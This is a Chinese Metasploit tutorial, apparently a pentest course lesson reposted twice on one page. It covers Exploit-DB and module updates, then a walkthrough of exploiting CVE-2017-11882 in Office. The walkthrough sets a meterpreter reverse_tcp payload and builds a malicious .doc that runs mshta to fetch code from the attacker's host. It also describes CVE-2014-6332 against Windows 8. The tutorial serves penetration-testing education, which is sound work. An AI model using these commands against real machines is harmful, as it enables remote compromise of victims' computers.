4.Metasploit框架更新


Metasploit 進階第二講  框架更新

 

EDB平台-互聯網安全漏洞庫

 

Exploit_DB是一個面向全世界安全工作人員的漏洞提交平台,是一份公開已知漏洞的存檔,便於企業改善公司的安全情況,同時幫助安全研究人員及滲透測試工程師進行更好的安全測試工作。

https://www.exploit-db.com/

 

exploits:漏洞信息

papers:文章

GHDB: Google hacking

shellcodes:填充數據

 

 

CVE-2017-11882介紹

CVE-2017-11882Ofice遠程代碼執行漏洞:

 

由Microsoft office中的公式編輯器造成,該模塊以OLE(Object Linking and Embedding,對象鏈接與嵌入)技術將公式嵌入在Office文檔內,由於編輯器沒有對名稱長度進行校驗,導致緩沖區溢出,若攻擊者通過構造特殊字符,office無法正確處理內存對象,成功利用該漏洞的攻擊者將能以當前用戶身份在目標操作系統執行任意代碼。

完美無彈窗,無異常,影響office全版本。

 

 

CVEMS

 

CVE是Common Vulnerabilities and Exposures的縮寫,意思是公共漏洞及披露。它是一個漏洞字典,由MITRE維護,給每個暴露出來漏洞給一個公共的名稱。可以在cve.mitre.org/cve/index.html中查看漏洞列表。

MS是微軟維護的自身的漏洞列表。可以在technet.microsoft.com/en-

us/security/bulletins查找最新的各種相關信息。

由於兩者標准不統一,為了更好對應,MITRE提供一個對應列表cve.mitre.org/data/refs/refmap/source-MS.html。

 

 

MSF添加exploit及更新Metasploit框架

 

添加exploit:

1.將下載的rb文件放入對應的文件夾下

2.執行reload_all或重新啟動MSF

 

更新metasploit框架:

apt update;apt install metasploit-framework

 

 

實操:利用CVE-2017-11882攻擊目標主機

 

MSF:

search  2017_11882

use exploit/windows/...

info 

show options

set uripath/

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.24.137

run

 

 

生成POC程序(帶有shell的doc文件):

 

python CVE-2017-11882.py  -c“mshta

http://192.168.24.137:8080/"-o11882.doc

  

其他POC程序生成:

https://github.com/Ridter/CVE-2017-11882 

python  CVE-2017-11882.py-c"cmd.exe/c

calc.cxe" –o 11882.doc

 

 

metasploit攻擊win8實例

 

Microsoft Windows OLE遠程代碼執行漏洞(CVE-2014-6332、MS14-064):

 

OLE(對象鏈接與嵌入)是一種允許應用程序共享數據和功能的技術。

Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008

SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012

Gold/R2,Windows RT Gold/8.1版本在實現上存在Windows OLE自動化數組遠程代碼執行漏洞,遠程攻擊者利用此漏洞構造特殊的網頁,用戶使用IE瀏覽器查看網頁時允許遠程執行任意代碼。

 

可能會遇到的問題:

 

1.Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444) 

    lsof-i:4444  ->  kill  -9  PID(man  lsof  ->  man kill)

2.注意查看報錯信息,多檢索

 

 

 

 

 

metasploit框架打開方式:

 

msfconsole         啟動命令行模式

armitage             啟動圖形化界面方式

 

Metasploit 進階第二講

框架更新

 

01 Exploit_db平台介紹

02 MSF添加exploit更新MSF

03 CVE-2017-11882利用實例

04合天網安實驗室攻擊win8實例

 

 

EDB平台-互聯網安全漏洞庫

 

Exploit_DB是一個面向全世界安全工作人員的漏洞提交平台,是一份公開已知漏洞的存檔,便於企業改善公司的安全情況,同時幫助安全研究人員及滲透測試工程師進行更好的安全測試工作。

 

https://www.exploit-db.com/

 

exploits:漏洞信息

papers:文章

GHDB: Google hacking

shellcodes:填充數據

 

 

CVE-2017-11882介紹

 

CVE-2017-11882Ofice遠程代碼執行漏洞:

 

Microsoft office中的公式編輯器造成,該模塊以OLEObject Linking and Embedding,對象鏈接與嵌入)技術將公式嵌入在Office文檔內,由於編輯器沒有對名稱長度進行校驗,導致緩沖區溢出,若攻擊者通過構造特殊字符,office無法正確處理內存對象,成功利用該漏洞的攻擊者將能以當前用戶身份在目標操作系統執行任意代碼。

完美無彈窗,無異常,影響office全版本。

 

 

CVEMS

 

CVECommon Vulnerabilities and Exposures的縮寫,意思是公共漏洞及披露。它是一個漏洞字典,由MITRE維護,給每個暴露出來漏洞給一個公共的名稱。可以在cve.mitre.org/cve/index.html中查看漏洞列表。

 

MS是微軟維護的自身的漏洞列表。可以在technet.microsoft.com/en-

us/security/bulletins查找最新的各種相關信息。

由於兩者標准不統一,為了更好對應,MITRE提供一個對應列表cve.mitre.org/data/refs/refmap/source-MS.html

 

MSF添加exploit及更新Metasploit框架

 

添加exploit

1.將下載的rb文件放入對應的文件夾下

2.執行reload_all或重新啟動MSF

 

更新metasploit框架:

apt updateapt install metasploit-framework

 

 

實操:利用CVE-2017-11882攻擊目標主機

 

MSF:

search  2017_11882

 

use exploit/windows/...

 

info

 

show options

 

set uripath/

 

set payload windows/meterpreter/reverse_tcp

 

 set lhost 192.168.24.137

 

run

 

 

生成POC程序(帶有shell的doc文件):

 

python CVE-2017-11882.py  -c“mshta

 

http://192.168.24.137:8080/"-o11882.doc

 

 

 

其他POC程序生成:

 

https://github.com/Ridter/CVE-2017-11882

 

python  CVE-2017-11882.py-c"cmd.exe/c

 

calc.cxe" –o 11882.doc

 

 

 

 

 

 

 

 

 

 

 

合天網安實驗室:metasploit攻擊win8實例

 

Microsoft Windows OLE遠程代碼執行漏洞(CVE-2014-6332、MS14-064):

 

 

OLE(對象鏈接與嵌入)是一種允許應用程序共享數據和功能的技術。

Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008

SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012

Gold/R2,Windows RT Gold/8.1版本在實現上存在Windows OLE自動化數組遠程代碼執行漏洞,遠程攻擊者利用此漏洞構造特殊的網頁,用戶使用IE瀏覽

器查看網頁時允許遠程執行任意代碼。

 

 

可能會遇到的問題:

 

  1. Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)

 

lsof-i:4444  ->  kill  -9  PID(man  lsof  ->  man kill)

2.注意查看報錯信息,多檢索

 

 

 

 

 

metasploit框架打開方式:

 

msfconsole         啟動命令行模式

 

armitage             啟動圖形化界面方式

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM